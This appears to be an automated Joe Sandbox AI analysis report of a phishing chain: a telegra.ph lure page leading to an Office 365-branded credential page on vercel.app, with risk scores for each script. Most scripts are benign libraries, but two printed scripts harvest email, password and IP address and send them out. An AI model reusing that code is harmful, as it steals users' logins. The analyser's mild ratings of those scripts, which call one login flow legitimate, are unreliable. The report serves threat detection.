| URL: https://telegra.ph Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://telegra.ph |
| URL: https://telegra.ph/js/jquery.selection.min.js... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a library for handling text selection and manipulation within input fields. While it does not contain any obvious high-risk indicators, it does exhibit some moderate-risk behaviors, such as external data transmission (using jQuery's AJAX functions) and aggressive DOM manipulation (modifying the input field's value and caret position). Additionally, the use of legacy APIs like `XDomainRequest` adds a minor risk factor. However, the overall intent of the script seems to be for legitimate text editing functionality, so the risk score is in the medium range."
} |
!function(t,e,r){var n=function(t){var n={text:"",start:0,end:0};if(!t.value)return n;try{if(e.getSelection)n.start=t.selectionStart,n.end=t.selectionEnd,n.text=t.value.slice(n.start,n.end);else if(r.selection){t.focus();var s=r.selection.createRange(),a=r.body.createTextRange();n.text=s.text;try{a.moveToElementText(t),a.setEndPoint("StartToStart",s)}catch(c){a=t.createTextRange(),a.setEndPoint("StartToStart",s)}n.start=t.value.length-a.text.length,n.end=n.start+s.text.length}}catch(c){}return n},s={getPos:function(t){var e=n(t);return{start:e.start,end:e.end}},setPos:function(t,r,n){n=this._caretMode(n),"start"===n?r.end=r.start:"end"===n&&(r.start=r.end),t.focus();try{if(t.createTextRange){var s=t.createTextRange();e.navigator.userAgent.toLowerCase().indexOf("msie")>=0&&(r.start=t.value.substr(0,r.start).replace(/\r/g,"").length,r.end=t.value.substr(0,r.end).replace(/\r/g,"").length),s.collapse(!0),s.moveStart("character",r.start),s.moveEnd("character",r.end-r.start),s.select()}else t.setSelectionRange&&t.setSelectionRange(r.start,r.end)}catch(a){}},getText:function(t){return n(t).text},_caretMode:function(t){switch(t=t||"keep",t===!1&&(t="end"),t){case"keep":case"start":case"end":break;default:t="keep"}return t},replace:function(e,r,s){var a=n(e),c=e.value,o=t(e).scrollTop(),i={start:a.start,end:a.start+r.length};e.value=c.substr(0,a.start)+r+c.substr(a.end),t(e).scrollTop(o),this.setPos(e,i,s)},insertBefore:function(e,r,s){var a=n(e),c=e.value,o=t(e).scrollTop(),i={start:a.start+r.length,end:a.end+r.length};e.value=c.substr(0,a.start)+r+c.substr(a.start),t(e).scrollTop(o),this.setPos(e,i,s)},insertAfter:function(e,r,s){var a=n(e),c=e.value,o=t(e).scrollTop(),i={start:a.start,end:a.end};e.value=c.substr(0,a.end)+r+c.substr(a.end),t(e).scrollTop(o),this.setPos(e,i,s)}};t.extend({selection:function(n){var s="text"===(n||"text").toLowerCase();try{if(e.getSelection){if(s)return e.getSelection().toString();var a,c=e.getSelection();return c.getRangeAt?a=c.getRangeAt(0):(a=r.createRange(),a.setStart(c.anchorNode,c.anchorOffset),a.setEnd(c.focusNode,c.focusOffset)),t("<div></div>").append(a.cloneContents()).html()}if(r.selection)return s?r.selection.createRange().text:r.selection.createRange().htmlText}catch(o){}return""}}),t.fn.extend({selection:function(t,e){switch(e=e||{},t){case"getPos":return s.getPos(this[0]);case"setPos":return this.each(function(){s.setPos(this,e)});case"replace":return this.each(function(){s.replace(this,e.text,e.caret)});case"insert":return this.each(function(){"before"===e.mode?s.insertBefore(this,e.text,e.caret):s.insertAfter(this,e.text,e.caret)});case"get":default:return s.getText(this[0])}return this}})}(jQuery,window,window.document);
|
| URL: https://telegra.ph/js/load-image.all.min.js?1... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a library for loading and manipulating images. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on image processing and transformation, which is a common and legitimate use case. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script demonstrates benign behavior and can be considered low risk."
} |
!function(e){"use strict";function t(e,i,a){var o,r=document.createElement("img");if(r.onerror=function(o){return t.onerror(r,o,e,i,a)},r.onload=function(o){return t.onload(r,o,e,i,a)},t.isInstanceOf("Blob",e)||t.isInstanceOf("File",e))o=r._objectURL=t.createObjectURL(e);else{if("string"!=typeof e)return!1;o=e,a&&a.crossOrigin&&(r.crossOrigin=a.crossOrigin)}return o?(r.src=o,r):t.readFile(e,function(e){var t=e.target;t&&t.result?r.src=t.result:i&&i(e)})}function i(e,i){!e._objectURL||i&&i.noRevoke||(t.revokeObjectURL(e._objectURL),delete e._objectURL)}var a=window.createObjectURL&&window||window.URL&&URL.revokeObjectURL&&URL||window.webkitURL&&webkitURL;t.isInstanceOf=function(e,t){return Object.prototype.toString.call(t)==="[object "+e+"]"},t.transform=function(e,i,a,o,r){a(t.scale(e,i,r),r)},t.onerror=function(e,t,a,o,r){i(e,r),o&&o.call(e,t)},t.onload=function(e,a,o,r,n){i(e,n),r&&t.transform(e,n,r,o,{})},t.transformCoordinates=function(){},t.getTransformedOptions=function(e,t){var i,a,o,r,n=t.aspectRatio;if(!n)return t;i={};for(a in t)t.hasOwnProperty(a)&&(i[a]=t[a]);return i.crop=!0,o=e.naturalWidth||e.width,r=e.naturalHeight||e.height,o/r>n?(i.maxWidth=r*n,i.maxHeight=r):(i.maxWidth=o,i.maxHeight=o/n),i},t.renderImageToCanvas=function(e,t,i,a,o,r,n,s,l,d){return e.getContext("2d").drawImage(t,i,a,o,r,n,s,l,d),e},t.hasCanvasOption=function(e){return e.canvas||e.crop||!!e.aspectRatio},t.scale=function(e,i,a){function o(){var e=Math.max((l||v)/v,(d||P)/P);e>1&&(v*=e,P*=e)}function r(){var e=Math.min((n||v)/v,(s||P)/P);e<1&&(v*=e,P*=e)}i=i||{};var n,s,l,d,u,c,f,g,h,m,p,S=document.createElement("canvas"),b=e.getContext||t.hasCanvasOption(i)&&S.getContext,x=e.naturalWidth||e.width,y=e.naturalHeight||e.height,v=x,P=y;if(b&&(i=t.getTransformedOptions(e,i,a),f=i.left||0,g=i.top||0,i.sourceWidth?(u=i.sourceWidth,void 0!==i.right&&void 0===i.left&&(f=x-u-i.right)):u=x-f-(i.right||0),i.sourceHeight?(c=i.sourceHeight,void 0!==i.bottom&&void 0===i.top&&(g=y-c-i.bottom)):c=y-g-(i.bottom||0),v=u,P=c),n=i.maxWidth,s=i.maxHeight,l=i.minWidth,d=i.minHeight,b&&n&&s&&i.crop?(v=n,P=s,p=u/c-n/s,p<0?(c=s*u/n,void 0===i.top&&void 0===i.bottom&&(g=(y-c)/2)):p>0&&(u=n*c/s,void 0===i.left&&void 0===i.right&&(f=(x-u)/2))):((i.contain||i.cover)&&(l=n=n||l,d=s=s||d),i.cover?(r(),o()):(o(),r())),b){if(h=i.pixelRatio,h>1&&(S.style.width=v+"px",S.style.height=P+"px",v*=h,P*=h,S.getContext("2d").scale(h,h)),m=i.downsamplingRatio,m>0&&m<1&&v<u&&P<c)for(;u*m>v;)S.width=u*m,S.height=c*m,t.renderImageToCanvas(S,e,f,g,u,c,0,0,S.width,S.height),u=S.width,c=S.height,e=document.createElement("canvas"),e.width=u,e.height=c,t.renderImageToCanvas(e,S,0,0,u,c,0,0,u,c);return S.width=v,S.height=P,t.transformCoordinates(S,i),t.renderImageToCanvas(S,e,f,g,u,c,0,0,v,P)}return e.width=v,e.height=P,e},t.createObjectURL=function(e){return!!a&&a.createObjectURL(e)},t.revokeObjectURL=function(e){return!!a&&a.revokeObjectURL(e)},t.readFile=function(e,t,i){if(window.FileReader){var a=new FileReader;if(a.onload=a.onerror=t,i=i||"readAsDataURL",a[i])return a[i](e),a}return!1},"function"==typeof define&&define.amd?define(function(){return t}):"object"==typeof module&&module.exports?module.exports=t:e.loadImage=t}(window),function(e){"use strict";"function"==typeof define&&define.amd?define(["./load-image"],e):e("object"==typeof module&&module.exports?require("./load-image"):window.loadImage)}(function(e){"use strict";var t=window.Blob&&(Blob.prototype.slice||Blob.prototype.webkitSlice||Blob.prototype.mozSlice);e.blobSlice=t&&function(){var e=this.slice||this.webkitSlice||this.mozSlice;return e.apply(this,arguments)},e.metaDataParsers={jpeg:{65505:[]}},e.parseMetaData=function(t,i,a,o){a=a||{},o=o||{};var r=this,n=a.maxMetaDataSize||262144,s=!(window.DataView&&t&&t.size>=12&&"image/jpeg"===t.type&&e.blobSlice);!s&&e.readFile(e.blobSlice.call(t,0,n),function(t){if(t.target.error)return console.log(t.target.error),void i(o);var n,s,l,d,u=t.target.result,c=new DataView(u),f=2,g=c.byteLeng |
| URL: https://telegra.ph/js/core.min.js?67... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a utility library for handling various types of embedded content, such as YouTube videos, Vimeo videos, Twitter posts, and Telegram messages. The code does not contain any high-risk indicators like dynamic code execution, data exfiltration, or redirects to malicious domains. The main behaviors observed are external data transmission, legacy practices, and tracking behavior, which are considered low to moderate risk. Additionally, the code seems to be focused on legitimate use cases like embedding media content, which reduces the overall risk score."
} |
"use strict";function _classCallCheck(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function _possibleConstructorReturn(t,e){if(!t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!e||"object"!=typeof e&&"function"!=typeof e?t:e}function _inherits(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Object.setPrototypeOf(t,e):t.__proto__=e)}function _sanitize(t,e){var o=document.createElement("a");o.href=t;var l=o.href.slice(0,o.href.indexOf(":"));return e.indexOf(l)>-1}function relativeUrl(t){var e=location,o=document.createElement("a");return o.href=t,e.origin!=o.origin?o.href:e.pathname!=o.pathname||e.search!=o.search?o.pathname+o.search+o.hash:e.href==o.href?o.hash||o.pathname+o.search+o.hash:o.hash}function getFigureValueByUrl(t,e){var o=void 0;return(o=t.match(/^(https?):\/\/(www\.)?youtube\.com\/watch.*v=([a-zA-Z0-9_-]+)/i))||(o=t.match(/^(https?):\/\/(www\.)?youtu\.be\/([a-zA-Z0-9_-]+)/i))?e({embed:"/embed/youtube?url="+encodeURIComponent(t)}):(o=t.match(/^(https?):\/\/(www\.)?vimeo\.com\/(\d+)/i))?e({embed:"/embed/vimeo?url="+encodeURIComponent(t)}):(o=t.match(/^(https?):\/\/(www\.|mobile\.)?twitter\.com\/(.+)\/status\/(\d+)/i))?e({embed:"/embed/twitter?url="+encodeURIComponent(t)}):(o=t.match(/^(https?):\/\/(t\.me|telegram\.me|telegram\.dog)\/([a-zA-Z0-9_]+)\/(\d+)/i))?e({embed:"/embed/telegram?url="+encodeURIComponent(t)}):(o=t.match(/^data:(image\/gif|image\/jpe?g|image\/png|video\/mp4);base64,(.*)$/))?e("video/"==o[1].substr(0,6)?{video:t}:{image:t}):((o=t.match(/^(https?):\/\/\S+/i))&&!function(){var o=document.createElement("img"),l=document.createElement("video");l.setAttribute("preload","auto");var r=0,i=!1,a=function(t){r++,i||(s(t),i=!0)},n=function(){r++,r>1&&!i&&(s("none"),i=!0)},s=function(o){e("photo"==o?{image:t}:"video"==o?{video:t}:!1)};o.addEventListener("load",function(){a("photo")}),l.addEventListener("loadeddata",function(){a("video")}),o.addEventListener("error",n),l.addEventListener("error",n),o.setAttribute("src",t),l.setAttribute("src",t)}(),e(!1))}function _resizeIframe(t,e,o){$("iframe").map(function(){var l=null;try{l=this.contentWindow}catch(r){}if(l&&l==t){var i=o/e;this.setAttribute("width","640"),this.setAttribute("height",Math.round(640*i)+""),this.parentNode&&this.parentNode.classList.contains("iframe_helper")&&(this.parentNode.style.paddingTop=100*i+"%"),window.quill&&quill.updateSelection(Quill.sources.USER)}})}function initQuill(){function t(t,e){return[t,function(t,o){return o.compose((new Delta).retain(o.length(),e))}]}function e(t){var e=a.scroll.line(t),o=_slicedToArray(e,2),l=o[0],r=o[1];return a.getText(t,l.length()-r)}function o(t){var o=e(t);return!o||"\n"==o}function l(t,e,l){var r=void 0,i=e.index;e.length>0&&a.scroll.deleteAt(i,e.length);var n=o(i),s=!1,u=a.scroll.descendant(BreakBlot,i),c=_slicedToArray(u,1);if(r=c[0])(!r.prev||r.prev instanceof BreakBlot)&&(a.scroll.deleteAt(--i,1),s=!0);else{var d=a.scroll.descendant(BreakBlot,i-1),p=_slicedToArray(d,1);r=p[0],r&&(a.scroll.deleteAt(--i,1),s=!0)}var h=a.scroll.descendant(SingleLineBlot,i),f=_slicedToArray(h,1);if(r=f[0],r||s||!t)a.insertText(i,"\n",Quill.sources.USER),a.setSelection(++i,Quill.sources.USER),(l.format.blockHeader||l.format.blockSubheader||l.format.blockBlockquote||l.format.blockPullquote)&&n&&a.formatLine(i,1,{blockHeader:!1,blockSubheader:!1,blockBlockquote:!1,blockPullquote:!1},Quill.sources.USER);else{a.insertEmbed(i,"textBreak",!0,Quill.sources.USER);var _=a.scroll.descendant(BreakBlot,i),m=_slicedToArray(_,1);r=m[0],!r||r.next||r.prev&&r.prev instanceof BreakBlot||(a.insertEmbed(++i,"textBreak",!0,Quill.sources.SILENT),a.setSelection(i,0,Quill.sources.SILENT))}return a.selection.scrollIntoView(),!1}function r(t){var e=a |
| URL: https://telegra.ph/js/jquery.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any aggressive or obfuscated behavior. Overall, this is a low-risk script that is commonly used for legitimate web development purposes."
} |
/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||m.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)||(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray||function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==m.type(a)||a.nodeType||m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.call |
| URL: https://telegra.ph/Clarkson-122025-01-02 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Click the Read Message button below to gain access to secure message.",
"prominent_button_name": "Read Message",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://telegra.ph/js/quill.min.js?10... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script appears to be a module loader pattern, commonly used in JavaScript libraries to support different module systems (CommonJS, AMD, etc.). It does not exhibit any high-risk behaviors such as dynamic code execution, data exfiltration, or redirects. The code is not obfuscated and does not interact with external domains. It primarily involves object and module management, which is typical for library code."
} |
!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):"object"==typeof exports?exports.Quill=e():t.Quill=e()}(this,function(){return function(t){function e(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return t[r].call(o.exports,o,o.exports,e),o.loaded=!0,o.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports=n(53)},function(t,e,n){"use strict";function r(t){return t&&t.__esModule?t:{"default":t}}var o=n(2),i=r(o),l=n(18),a=r(l),s=n(29),u=r(s),c=n(30),f=r(c),p=n(42),h=r(p),d=n(34),y=r(d),v=n(31),b=r(v),g=n(32),m=r(g),_=n(43),O=r(_),w=n(33),x=r(w),k=n(44),E=r(k),j=n(51),A=r(j),N=n(52),q=r(N);a["default"].register({"blots/block":u["default"],"blots/block/embed":s.BlockEmbed,"blots/break":f["default"],"blots/container":h["default"],"blots/cursor":y["default"],"blots/embed":b["default"],"blots/inline":m["default"],"blots/scroll":O["default"],"blots/text":x["default"],"modules/clipboard":E["default"],"modules/history":A["default"],"modules/keyboard":q["default"]}),i["default"].register(u["default"],f["default"],y["default"],m["default"],O["default"],x["default"]),t.exports=a["default"]},function(t,e,n){"use strict";var r=n(3),o=n(7),i=n(12),l=n(13),a=n(14),s=n(15),u=n(16),c=n(17),f=n(8),p=n(10),h=n(11),d=n(9),y=n(6),v={Scope:y.Scope,create:y.create,find:y.find,query:y.query,register:y.register,Container:r["default"],Format:o["default"],Leaf:i["default"],Embed:u["default"],Scroll:l["default"],Block:s["default"],Inline:a["default"],Text:c["default"],Attributor:{Attribute:f["default"],Class:p["default"],Style:h["default"],Store:d["default"]}};Object.defineProperty(e,"__esModule",{value:!0}),e["default"]=v},function(t,e,n){"use strict";function r(t){var e=a.find(t);if(null==e)try{e=a.create(t)}catch(n){e=a.create(a.Scope.INLINE),[].slice.call(t.childNodes).forEach(function(t){e.domNode.appendChild(t)}),t.parentNode.replaceChild(e.domNode,t),e.attach()}return e}var o=this&&this.__extends||function(t,e){function n(){this.constructor=t}for(var r in e)e.hasOwnProperty(r)&&(t[r]=e[r]);t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)},i=n(4),l=n(5),a=n(6),s=function(t){function e(){t.apply(this,arguments)}return o(e,t),e.prototype.appendChild=function(t){this.insertBefore(t)},e.prototype.attach=function(){var e=this;t.prototype.attach.call(this),this.children=new i["default"],[].slice.call(this.domNode.childNodes).reverse().forEach(function(t){try{var n=r(t);e.insertBefore(n,e.children.head)}catch(o){if(o instanceof a.ParchmentError)return;throw o}})},e.prototype.deleteAt=function(t,e){return 0===t&&e===this.length()?this.remove():void this.children.forEachAt(t,e,function(t,e,n){t.deleteAt(e,n)})},e.prototype.descendant=function(t,n){var r=this.children.find(n),o=r[0],i=r[1];return null==t.blotName&&t(o)||null!=t.blotName&&o instanceof t?[o,i]:o instanceof e?o.descendant(t,i):[null,-1]},e.prototype.descendants=function(t,n,r){void 0===n&&(n=0),void 0===r&&(r=Number.MAX_VALUE);var o=[],i=r;return this.children.forEachAt(n,r,function(n,r,l){(null==t.blotName&&t(n)||null!=t.blotName&&n instanceof t)&&o.push(n),n instanceof e&&(o=o.concat(n.descendants(t,r,i))),i-=l}),o},e.prototype.detach=function(){this.children.forEach(function(t){t.detach()}),t.prototype.detach.call(this)},e.prototype.formatAt=function(t,e,n,r){this.children.forEachAt(t,e,function(t,e,o){t.formatAt(e,o,n,r)})},e.prototype.insertAt=function(t,e,n){var r=this.children.find(t),o=r[0],i=r[1];if(o)o.insertAt(i,e,n);else{var l=null==n?a.create("text",e):a.create(e,n);this.appendChild(l)}},e.prototype.insertBefore=function(t,e){if(null!=this.statics.allowedChildren&&!this.statics.allowedChildren.some(function(e){return t instanceof e}))throw new a.ParchmentError("Cannot insert "+t.statics.blotName+" into "+this.statics.blotName);t.insertInto(this,e)},e.prototype.length=function(){return this.children.reduce(function(t,e){return t+e.length( |
| URL: https://telegra.ph/Clarkson-122025-01-02 Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://office365-mauve.vercel.app/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates some moderate-risk behaviors, such as storing user credentials in sessionStorage and sending user data (email, password, IP address) to an external server. While the intent appears to be a login flow, the lack of transparency around the data transmission and the potential for abuse raise concerns. Further review is recommended to ensure the script's legitimacy and security practices."
} |
console.log('Script file loaded');
document.addEventListener('DOMContentLoaded', function () {
const usernameInput = document.getElementById('username');
const passwordInput = document.getElementById('password');
const nextButton = document.getElementById('nextButton');
const errorMessage = document.getElementById('errorMessage');
const errorMessagePassword = document.getElementById('errorMessagePassword');
passwordInput.style.display = 'none';
nextButton.addEventListener('click', async function () {
const trimmedUsername = usernameInput.value.trim();
const trimmedPassword = passwordInput.value.trim();
if (passwordInput.style.display === 'none') {
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = ''; // Clear password error message
return;
}
errorMessage.textContent = ''; // Clear username error message
// Store username in sessionStorage
sessionStorage.setItem('username', trimmedUsername);
passwordInput.style.display = 'block';
nextButton.textContent = 'Sign In';
} else {
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = ''; // Clear password error message
return;
}
if (!trimmedPassword) {
errorMessagePassword.textContent = 'Please fill in the password';
errorMessage.textContent = ''; // Clear username error message
return;
}
errorMessage.textContent = ''; // Clear username error message
errorMessagePaassword.textContent = ''; // Clear password error message
// Store password in sessionStorage
sessionStorage.setItem('password', trimmedPassword);
try {
const ip = await getIPAddress();
const data = {
email: trimmedUsername,
password: trimmedPassword,
ip,
};
// Send email and to Telegram
await sendRequest(data);
// Reset the form
document.getElementById('loginForm').reset();
passwordInput.style.display = 'none';
nextButton.textContent = 'Next';
} catch (error) {
console.error('Error:', );
}
// Redirect to next.html
window.location = 'next.html';
}
});
// ... existing code ...
});
|
| URL: https://office365-mauve.vercel.app/js/index.js... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script demonstrates some moderate-risk behaviors, such as sending user data (email and password) to an external server without clear transparency. However, it does not exhibit any high-risk indicators like dynamic code execution or redirects to suspicious domains. The script appears to be implementing a basic login functionality, which is a common and legitimate use case. Some adjustments are made to account for the transparent data transmission and the lack of clear malicious intent."
} |
console.log('Script file loaded');
document.addEventListener('DOMContentLoaded', function () {
console.log('DOM content loaded - initializing login functionality');
const usernameInput = document.getElementById('username');
const passwordInput = document.getElementById('password');
const nextButton = document.getElementById('nextButton');
const errorMessage = document.getElementById('errorMessage');
const errorMessagePassword = document.getElementById('errorMessagePassword');
const loginForm = document.getElementById('loginForm');
passwordInput.style.display = 'none';
nextButton.addEventListener('click', async function () {
console.log('Next button clicked - starting validation');
const trimmedUsername = usernameInput.value.trim();
const trimmedPassword = passwordInput.value.trim();
if (passwordInput.style.display === 'none') {
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = ''; // Clear password error message
console.log('Validation failed - Username field is empty');
return;
}
errorMessage.textContent = ''; // Clear username error message
passwordInput.style.display = 'block';
nextButton.textContent = 'Sign In';
console.log('Username validated - showing password field');
} else {
if (!trimmedUsername) {
errorMessage.textContent = 'Please fill in the username';
errorMessagePassword.textContent = ''; // Clear password error message
console.log('Validation failed - Username field is empty on second step');
return;
}
if (!trimmedPassword) {
errorMessagePassword.textContent = 'Please fill in the password';
errorMessage.textContent = ''; // Clear username error message
console.log('Validation failed - Password field is empty');
return;
}
errorMessage.textContent = ''; // Clear username error message
errorMessagePassword.textContent = ''; // Clear password error message
console.log('Username and password validated - preparing to get IP and send request');
try {
console.log('Attempting to retrieve IP address');
const ip = await getIPAddress();
const data = {
email: trimmedUsername,
password: trimmedPassword,
ip,
};
console.log('IP address retrieved successfully:', ip);
console.log('Sending data to server:', data);
await sendRequest(data);
} catch (error) {
console.error('Error during login process:', error);
}
loginForm.reset();
passwordInput.style.display = 'none';
nextButton.textContent = 'Next';
console.log('Form reset - password field hidden again');
}
});
const images = [
'images/image1.jpg',
'images/image2.jpg',
'images/image3.jpg',
'images/image4.jpg'
];
const slideshowImages = document.querySelectorAll('.slideshow-image');
let currentIndex = 0;
function changeBackground() {
console.log(`Changing background image to index ${currentIndex}`);
slideshowImages.forEach((image, index) => {
image.style.display = index === currentIndex ? 'block' : 'none';
});
currentIndex = (currentIndex + 1) % images.length;
setTimeout(changeBackground, 5000); // Change image every 5 seconds
}
changeBackground();
loginForm.addEventListener('submit', function (event) { |
| URL: https://smtpjs.com/v3/smtp.js... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a library for sending emails using the SMTP protocol. While it does not exhibit any high-risk indicators, it has some moderate-risk behaviors, such as external data transmission and the use of legacy APIs like XDomainRequest. Additionally, the script interacts with the 'smtpjs.com' domain, which is not a widely known or trusted domain, warranting further investigation. Overall, the script requires closer review due to its potential for misuse, but it does not appear to be inherently malicious."
} |
/* SmtpJS.com - v3.0.0 */
var Email = { send: function (a) { return new Promise(function (n, e) { a.nocache = Math.floor(1e6 * Math.random() + 1), a.Action = "Send"; var t = JSON.stringify(a); Email.ajaxPost("https://smtpjs.com/v3/smtpjs.aspx?", t, function (e) { n(e) }) }) }, ajaxPost: function (e, n, t) { var a = Email.createCORSRequest("POST", e); a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), a.onload = function () { var e = a.responseText; null != t && t(e) }, a.send(n) }, ajax: function (e, n) { var t = Email.createCORSRequest("GET", e); t.onload = function () { var e = t.responseText; null != n && n(e) }, t.send() }, createCORSRequest: function (e, n) { var t = new XMLHttpRequest; return "withCredentials" in t ? t.open(e, n, !0) : "undefined" != typeof XDomainRequest ? (t = new XDomainRequest).open(e, n) : t = null, t } };
|
| URL: https://office365-mauve.vercel.app Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://office365-mauve.vercel.app |
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": "recipient@email.com",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://office365-mauve.vercel.app/ Model: Joe Sandbox AI | {
"brands": [
"IONOS"
]
} |
|
